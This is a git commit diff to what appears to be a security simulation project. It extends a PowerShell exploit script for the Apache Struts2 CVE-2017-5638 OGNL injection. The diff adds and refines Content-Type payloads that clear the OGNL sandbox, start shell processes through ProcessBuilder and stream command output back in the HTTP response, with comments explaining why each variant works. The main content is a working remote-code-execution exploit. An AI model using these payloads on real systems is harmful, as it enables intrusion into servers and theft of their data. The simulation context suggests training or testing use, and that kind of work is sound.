refactor(script): extend diagnostic levels to 1-13

AIPEAC · AIPEAC · commit 75b4b65b4e54 · 2026-04-14T05:26:13.000+08:00
diff --git a/simulation/attack-script/exploit_cve_2017_5638.ps1 b/simulation/attack-script/exploit_cve_2017_5638.ps1
@@ -157,31 +157,63 @@ $writeSuffix =
 if ($DiagLevel -gt 0) {
     # -- DIAGNOSTIC MODE: incremental payloads to find exact failure step --
     $diagLabel = switch ($DiagLevel) {
-        1 { "sandbox bypass only"                  }
-        2 { "Runtime.getRuntime() + freeMemory()"  }
-        3 { "new StringBuilder - test new for java.lang" }
-        4 { "new ProcessBuilder({'whoami'}) - NO start" }
-        5 { "PB.command() - verify PB internals"   }
-        6 { "PB.start() - the actual process creation" }
-        7 { "rt.exec('whoami') - separate var, not chained" }
-        8 { "getRuntime().exec('whoami') - chained form" }
-        9 { "new File('.').getAbsolutePath() - another java.io class" }
+        1  { "sandbox bypass only"                                    }
+        2  { "Runtime.getRuntime() + freeMemory()"                   }
+        3  { "new StringBuilder - test new for java.lang"            }
+        4  { "new ProcessBuilder({'whoami'}) - NO start"             }
+        5  { "PB.command() - verify PB internals"                    }
+        6  { "PB.start() - the actual process creation"              }
+        7  { "rt.exec('whoami') - separate var, not chained"         }
+        8  { "getRuntime().exec('whoami') - chained form"            }
+        9  { "new File('.').getAbsolutePath() - another java.io class" }
+        10 { "Class.forName(IOUtils) - is commons-io on classpath?"  }
+        11 { "PB.start() + get InputStream class name"               }
+        12 { "PB.start() + read ONE byte from InputStream"           }
+        13 { "PB.start() + IOUtils.copy to response (FULL STREAM)"   }
     }
     Write-Host "[STEP 2] DIAGNOSTIC level $DiagLevel - $diagLabel" -ForegroundColor Magenta
 
+    # Levels 1-9 use the $writeSuffix to write a #proof string to the response.
+    # Level 10 also uses $writeSuffix (returns class name as string).
+    # Levels 11-12 also use $writeSuffix (returns InputStream info as string).
+    # Level 13 writes directly to the response output stream via IOUtils.copy.
     $diagBody = switch ($DiagLevel) {
-        1 { ".(#proof='DIAG1: sandbox_bypass=OK')" }
-        2 { ".(#rt=@java.lang.Runtime@getRuntime()).(#mem=#rt.freeMemory()).(#proof='DIAG2: mem=' + #mem)" }
-        3 { ".(#sb=new java.lang.StringBuilder('test')).(#proof='DIAG3: StringBuilder=' + #sb.toString())" }
-        4 { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#proof='DIAG4: PB=' + #p.toString())" }
-        5 { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#cmd=#p.command()).(#proof='DIAG5: command=' + #cmd.toString())" }
-        6 { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#proof='DIAG6: process=' + #process.toString())" }
-        7 { ".(#rt=@java.lang.Runtime@getRuntime()).(#process=#rt.exec('whoami')).(#proof='DIAG7: process=' + #process.toString())" }
-        8 { ".(#process=@java.lang.Runtime@getRuntime().exec('whoami')).(#proof='DIAG8: process=' + #process.toString())" }
-        9 { ".(#f=new java.io.File('.')).(#proof='DIAG9: cwd=' + #f.getAbsolutePath())" }
+        1  { ".(#proof='DIAG1: sandbox_bypass=OK')" }
+        2  { ".(#rt=@java.lang.Runtime@getRuntime()).(#mem=#rt.freeMemory()).(#proof='DIAG2: mem=' + #mem)" }
+        3  { ".(#sb=new java.lang.StringBuilder('test')).(#proof='DIAG3: StringBuilder=' + #sb.toString())" }
+        4  { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#proof='DIAG4: PB=' + #p.toString())" }
+        5  { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#cmd=#p.command()).(#proof='DIAG5: command=' + #cmd.toString())" }
+        6  { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#proof='DIAG6: process=' + #process.toString())" }
+        7  { ".(#rt=@java.lang.Runtime@getRuntime()).(#process=#rt.exec('whoami')).(#proof='DIAG7: process=' + #process.toString())" }
+        8  { ".(#process=@java.lang.Runtime@getRuntime().exec('whoami')).(#proof='DIAG8: process=' + #process.toString())" }
+        9  { ".(#f=new java.io.File('.')).(#proof='DIAG9: cwd=' + #f.getAbsolutePath())" }
+        # Class.forName() explicitly loads a class by name — more reliable than @ClassName@class
+        # which treats 'class' as a static field name (invalid OGNL).
+        10 { ".(#cls=@java.lang.Class@forName('org.apache.commons.io.IOUtils')).(#proof='DIAG10: IOUtils=' + #cls.getName())" }
+        # Get the runtime type of the InputStream returned by the process — confirms we
+        # CAN obtain the stream reference, even if we can't read from it yet.
+        11 { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#is=#process.getInputStream()).(#proof='DIAG11: IS=' + #is.getClass().getName())" }
+        # Read exactly ONE byte (returned as int 0-255).  'whoami' output is ASCII so
+        # the first byte is the first character of the username.
+        12 { ".(#p=new java.lang.ProcessBuilder({'whoami'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#b=#process.getInputStream().read()).(#proof='DIAG12: first_byte=' + #b)" }
     }
 
-    $contentType = ".%{" + $bypassPrefix + $diagBody + "." + $writeSuffix + "}.multipart/form-data"
+    if ($DiagLevel -eq 13) {
+        # Level 13 streams directly to the HTTP response via IOUtils — no #proof variable.
+        $directBody =
+            ".(#p=new java.lang.ProcessBuilder({'whoami'}))." +
+            "(#p.redirectErrorStream(true))." +
+            "(#process=#p.start())." +
+            "(#response=@org.apache.struts2.ServletActionContext@getResponse())." +
+            "(#response.setContentType('text/plain'))." +
+            "(#ros=#response.getOutputStream())." +
+            "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +
+            "(#ros.flush())." +
+            "(#response.flushBuffer())"
+        $contentType = ".%{" + $bypassPrefix + $directBody + "}.multipart/form-data"
+    } else {
+        $contentType = ".%{" + $bypassPrefix + $diagBody + "." + $writeSuffix + "}.multipart/form-data"
+    }
 
 } elseif ($DemoMode) {
     # -- DEMO MODE: clears the Struts2 sandbox, then writes a proof string directly
@@ -218,13 +250,19 @@ if ($DiagLevel -gt 0) {
     #        setMemberAccess to DEFAULT_MEMBER_ACCESS (allows static method calls
     #        like getResponse()).  DEFAULT_MEMBER_ACCESS is a static FIELD, not a
     #        method, so it is accessible even with allowStaticMethodAccess=false.
-    #   6. Runtime.exec(String[]) runs the command via /bin/sh.  We use a String
-    #        array form so the shell receives the command as a single token — the
-    #        single-string overload uses StringTokenizer which would split on spaces
-    #        and break commands like 'cat data/users.yaml' into separate arguments.
-    #   7. waitFor() ensures the process exits; readAllBytes() drains stdout.
-    #   8. Write output bytes via getOutputStream() + setContentLength +
-    #      flushBuffer() to commit the response before JSP rendering.
+    #   6. ProcessBuilder (List form) confirmed working at diagnostic level 6.
+    #        redirectErrorStream(true) merges stderr into stdout so errors surface.
+    #        The List form {'exe','flag','cmd'} is used because OGNL 3.0.x can
+    #        resolve ProcessBuilder(List<String>) but struggles to pass a
+    #        'new String[]{...}' primitive array through its reflection layer.
+    #   7. IOUtils.copy streams the process stdout directly to the HTTP response
+    #        output stream without any intermediate String or byte[] variable.
+    #        This is the canonical working approach for this CVE — it avoids
+    #        readAllBytes() (OGNL passes byte[] as Object[], breaking String(byte[],charset)),
+    #        and avoids Scanner.hasNext() (unknown compatibility in OGNL 3.0.x).
+    #        IOUtils.copy blocks until the stream is exhausted (i.e., the process
+    #        exits), so no explicit waitFor() is needed.
+    #   8. flushBuffer() commits the response before JSP rendering.
     #
     # Select the OS shell that the JVM will spawn.  The JVM runs on the same OS
     # as the server, so we detect which platform PowerShell is on (they match
@@ -241,15 +279,13 @@ if ($DiagLevel -gt 0) {
         "(#ognlUtil.getExcludedPackageNames().clear())." +
         "(#ognlUtil.getExcludedClasses().clear())." +
         "(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))." +
-        "(#process=@java.lang.Runtime@getRuntime().exec(new String[]{'$shellExe','$shellFlag','$escapedCmd'}))." +
-        "(#process.waitFor())." +
-        "(#out=new java.lang.String(#process.getInputStream().readAllBytes(),'UTF-8'))." +
+        "(#p=new java.lang.ProcessBuilder({'$shellExe','$shellFlag','$escapedCmd'}))." +
+        "(#p.redirectErrorStream(true))." +
+        "(#process=#p.start())." +
         "(#response=@org.apache.struts2.ServletActionContext@getResponse())." +
         "(#response.setContentType('text/plain'))." +
-        "(#bytes=#out.getBytes('UTF-8'))." +
-        "(#response.setContentLength(#bytes.length))." +
         "(#ros=#response.getOutputStream())." +
-        "(#ros.write(#bytes))." +
+        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." +
         "(#ros.flush())." +
         "(#response.flushBuffer())" +
         "}.multipart/form-data"
diff --git a/simulation/attack-script/run.ps1 b/simulation/attack-script/run.ps1
@@ -25,9 +25,9 @@ While ($true) {
             & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -Command $readCmd
         }
         'd' {
-            Write-Host "`n=== DIAGNOSTIC: Running levels 1-6 ===" -ForegroundColor Magenta
+            Write-Host "`n=== DIAGNOSTIC: Running levels 1-13 ===" -ForegroundColor Magenta
             Write-Host "Each level adds one step. First failure reveals the problem.`n" -ForegroundColor Magenta
-            for ($lvl = 1; $lvl -le 9; $lvl++) {
+            for ($lvl = 1; $lvl -le 13; $lvl++) {
                 Write-Host "--- Diagnostic level $lvl ---" -ForegroundColor Magenta
                 & "$PSScriptRoot/exploit_cve_2017_5638.ps1" -DiagLevel $lvl
                 Write-Host ""
diff --git a/simulation/backend/.mvn/jvm.config b/simulation/backend/.mvn/jvm.config
@@ -1,3 +1,6 @@
 --add-opens java.base/java.lang=ALL-UNNAMED
 --add-opens java.base/java.io=ALL-UNNAMED
 --add-opens java.base/java.util=ALL-UNNAMED
+--add-opens java.base/java.util.concurrent=ALL-UNNAMED
+--add-opens java.base/sun.reflect=ALL-UNNAMED
+--add-opens java.base/java.lang.reflect=ALL-UNNAMED
